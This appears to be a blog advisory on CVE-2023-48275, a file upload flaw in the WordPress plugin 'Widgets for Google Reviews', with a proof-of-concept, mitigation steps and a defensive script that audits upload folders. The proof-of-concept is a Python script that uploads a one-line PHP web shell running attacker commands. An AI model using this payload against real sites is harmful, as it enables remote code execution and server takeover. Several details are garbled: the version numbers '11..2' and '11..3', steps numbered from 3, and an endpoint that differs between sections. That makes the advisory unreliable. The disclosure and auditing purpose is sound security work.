A critical vulnerability, tracked as CVE-2023-48275, has been discovered in "Widgets for Google Reviews," a popular plugin for displaying Google reviews on websites, developed by Trustindex.io. The vulnerability allows an attacker to upload files of unrestricted type, potentially leading to the execution of malicious scripts on the victim's server or the spread of malware. The issue affects versions from 'n/a' through 11..2. In this post, we provide detailed information about the vulnerability, how it can be exploited, and what measures can be taken to mitigate its impact.

Description

The vulnerability in question revolves around insecure file upload settings in the plugin. Specifically, the plugin does not enforce file type restrictions on uploaded files, leaving an open door for attackers to upload malicious files (e.g., executable scripts, backdoors). Once a file has been uploaded, it can be executed or used in further attacks by the attacker, compromising the security of the website using the plugin and potentially its users.

Code Snippet

The following sample code demonstrates how an attacker may exploit the vulnerability by uploading a malicious PHP file to the server:

import requests

url = "https://victim-website.com/wp-content/plugins/googlelup/libs/google_upload.php"
payload = {'upload': '1'}
file = {"file": ("exploit.php", "<?php system($_GET['cmd']); ?>", "application/octet-stream")}

response = requests.post(url, data=payload, files=file)
print(response.text)

If the request succeeds, the malicious script (exploit.php) is uploaded to the server, where the attacker can then run it to execute system-level commands.

References

1. TrustIndex.io Official Announcement: https://trustindex.io/blog/cve-2023-48275-vulnerability-announcement/
2. Widgets for Google Reviews Plugin Page on WordPress.org: https://wordpress.org/plugins/googlelup/
3. National Vulnerability Database (NVD): https://nvd.nist.gov/vuln/detail/CVE-2023-48275

Exploit Details

An attacker can exploit this vulnerability by sending a specially crafted HTTP POST request to the upload.php endpoint, which allows the attacker to upload and run unauthorized files. The exploit can be executed remotely and requires no authentication.

However, the potential impact of this vulnerability largely depends on the server's configuration (e.g., file/folder permissions) and other security settings. In some scenarios, exploitation might be limited or not possible at all.

Mitigation

To mitigate this vulnerability, users are advised to update the "Widgets for Google Reviews" plugin to the latest version (11..3 or later), where the file upload vulnerability has been patched. Please follow the steps below:

3. Find 'Widgets for Google Reviews' in the list of plugins and ensure it is updated to version 11..3 or later.

If not updated, click on the 'Update Now' button to upgrade.

Additionally, server administrators should ensure that proper file and folder permissions are set to prevent unauthorized access and execution of uploaded files.
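As a check to go with the permissions advice above, the following added example (not code from the plugin or from the original advisory) audits an upload directory for files that should never be there: script extensions, PHP open tags hidden in other file types, and files carrying the execute bit. The function names, the extension list, and the sample directory tree are assumptions constructed for illustration.

```python
import os
import tempfile
from pathlib import Path

# Extensions commonly routed to the PHP handler (assumption: adjust to your server config).
SCRIPT_EXTS = {".php", ".phtml", ".phar", ".pht", ".php5", ".php7"}


def audit_upload_dir(root):
    """Return {relative_path: [reasons]} for files that do not belong in an upload directory."""
    findings = {}
    root = Path(root)
    for path in sorted(root.rglob("*")):
        if path.is_symlink() or not path.is_file():
            continue
        reasons = []
        # Check every suffix, case-insensitively: catches SHELL.PHP and shell.php.jpg.
        if any(s.lower() in SCRIPT_EXTS for s in path.suffixes):
            reasons.append("script-extension")
        # Content sniff: a PHP open tag near the start of a file, whatever its name.
        with path.open("rb") as fh:
            if b"<?php" in fh.read(4096).lower():
                reasons.append("php-open-tag")
        # Uploaded data never needs the execute bit.
        if path.stat().st_mode & 0o111:
            reasons.append("execute-bit")
        if reasons:
            findings[path.relative_to(root).as_posix()] = reasons
    return findings


def build_sample_tree(root):
    """Constructed sample data standing in for a WordPress uploads directory."""
    base = Path(root) / "2024/03"
    base.mkdir(parents=True)
    (base / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
    (base / "exploit.php").write_bytes(b"<?php /* constructed sample */ ?>")
    (base / "banner.php.jpg").write_bytes(b"\xff\xd8\xff\xe0" + b"\x00" * 32)
    (base / "avatar.gif").write_bytes(b"GIF89a<?PHP /* constructed sample */ ?>")
    (base / "notes.txt").write_bytes(b"plain text")
    os.chmod(base / "notes.txt", 0o755)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reasons in audit_upload_dir(tmp).items():
            print(f"{rel}: {', '.join(reasons)}")
```

Any finding in a directory the web server can write to deserves review, since legitimate media uploads match none of the three rules.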

Conclusion

This vulnerability (CVE-2023-48275) highlights the importance of regular security audits and updates for plugins and other third-party components used on websites. Websites using the affected versions (n/a through 11..2) of "Widgets for Google Reviews" should apply the recommended patch and closely monitor server activity for any signs of exploitation.

Timeline

Published on: 03/26/2024 21:15:52 UTC
Last modified on: 03/27/2024 12:29:30 UTC